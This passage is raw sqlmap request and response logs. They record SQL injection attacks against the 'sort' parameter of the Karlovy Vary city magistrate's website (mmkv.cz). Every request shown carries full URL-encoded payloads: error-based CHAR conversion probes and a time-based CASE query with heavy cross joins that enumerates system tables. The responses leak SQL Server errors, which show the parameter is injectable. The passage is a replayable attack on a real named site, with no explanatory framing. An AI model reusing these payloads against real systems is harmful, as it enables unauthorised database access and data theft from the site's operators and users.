(40)%2BCHAR(49)%2BCHAR(49)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(56)%2BCHAR(49)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(49)%2BCHAR(54)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(48)%2BCHAR(49)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(55)%2BCHAR(48)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(50)%2BCHAR(48)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(57)%2BCHAR(57)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(53)%2BCHAR(55)%2BCHAR(41)%2BCHAR(37)%2BCHAR(50)%2BCHAR(98)%2BCHAR(67)%2BCHAR(72)%2BCHAR(65)%2BCHAR(82)%2BCHAR(40)%2BCHAR(49)%2BCHAR(48)%2BCHAR(57)%2BCHAR(41)%2BCHAR(41)%2BCHAR(32)%2BCHAR(70)%2BCHAR(82)%2BCHAR(79)%2BCHAR(77)%2BCHAR(32)%2BCHAR(115)%2BCHAR(121)%2BCHAR(115)%2BCHAR(99)%2BCHAR(111)%2BCHAR(108)%2BCHAR(117)%2BCHAR(109)%2BCHAR(110)%2BCHAR(115)%2BCHAR(41)%20ELSE%206910%2A(SELECT%206910%20FROM%20master..sysdatabases)%20END))&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e09' SELECT permission denied on object 'sysoperators', database 'msdb', owner 'dbo'. /_mmkv.asp, line 275 ############################################################################ HTTP request [#5]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#5](500 Internal Server Error): Content-length: 7504 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html

Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_mmkv.asp, line 275 ############################################################################ HTTP request [#6]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#6](500 Internal Server Error): Content-length: 7504 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_mmkv.asp, line 275 ############################################################################ HTTP request [#7]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#7](500 Internal Server Error): Content-length: 7504 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_mmkv.asp, line 275 ############################################################################ HTTP request [#8]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#8](500 Internal Server Error): Content-length: 7504 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_mmkv.asp, line 275 ############################################################################ HTTP request [#9]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#9](500 Internal Server Error): Content-length: 7504 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_mmkv.asp, line 275 ############################################################################ HTTP request [#10]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#10](500 Internal Server Error): Content-length: 7504 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_mmkv.asp, line 275 ############################################################################ HTTP request [#11]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#11](500 Internal Server Error): Content-length: 7504 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_mmkv.asp, line 275 ############################################################################ HTTP request [#12]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#12](500 Internal Server Error): Content-length: 7504 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_mmkv.asp, line 275 ############################################################################ HTTP request [#13]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#13](500 Internal Server Error): Content-length: 7504 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_mmkv.asp, line 275 ############################################################################ HTTP request [#14]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#14](500 Internal Server Error): Content-length: 7504 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_mmkv.asp, line 275 ############################################################################ HTTP request [#15]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#15](500 Internal Server Error): Content-length: 7504 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html MMKV.cz - Magistrát města Karlovy Vary

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_mmkv.asp, line 275 ############################################################################ HTTP request [#16]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#16](500 Internal Server Error): Content-length: 7504 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28select%20convert%28int%2CCHAR%2852%29%2bCHAR%2867%29%2bCHAR%28117%29%2bCHAR%2881%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%2870%29%2bCHAR%28120%29%2bCHAR%2899%29%2bCHAR%2857%29%2bCHAR%28109%29%29%20FROM%20syscolumns%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:05 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e07' Syntax error converting the varchar value '4CuQteFxc9m' to a column of data type int. /_mmkv.asp, line 275 ############################################################################ HTTP request [#17]: GET /index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odborfk=&sort=%28SELECT%20%28CASE%20WHEN%20%28UNICODE%28SUBSTRING%28%28SELECT%20ISNULL%28CAST%28LTRIM%28STR%28COUNT%28%2A%29%29%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20msdb.dbo.sysoperators%29%2C1%2C1%29%29%3E51%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20ELSE%205859%20END%29%29&vyhledat=vyhledat HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/_;q=0.8 User-agent: sqlmap/1.0-dev-1088011 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: mmkv.cz Pragma: no-cache Cache-control: no-cache,no-store Cookie: ASPSESSIONIDCAQRSARQ=EDJKPCMBIGGBKKDFGEFEENCN Connection: close HTTP response [#17](500 Internal Server Error): Content-length: 7499 X-powered-by: ASP.NET Uri: http://mmkv.cz:80/index.asp?cenaDo=&cenaOd=&datumDo=&datumOd=&menu=398&rec_category_fk=&rec_code2=-1&rec_name=&rec_number1=&rec_odbor_fk=&sort=%28SELECT%20%28CASE%20WHEN%20%28UNICODE%28SUBSTRING%28%28SELECT%20ISNULL%28CAST%28LTRIM%28STR%28COUNT%28%2A%29%29%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20msdb.dbo.sysoperators%29%2C1%2C1%29%29%3E51%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20ELSE%205859%20END%29%29&vyhledat=vyhledat Server: Microsoft-IIS/6.0 Connection: close Cache-control: private Date: Fri, 09 Aug 2013 08:27:06 Content-type: text/html

Investiční plány města rok 2013 (.xls 18kB) Plán oprav místních komunikací 2013 (.xls 78kB) Microsoft OLE DB Provider for SQL Server chyba 80040e09' SELECT permission denied on object 'sysoperators', database 'msdb', owner 'dbo'. /_mmkv.asp, line 275 ############################################################################ HTTP request [#18]: GET 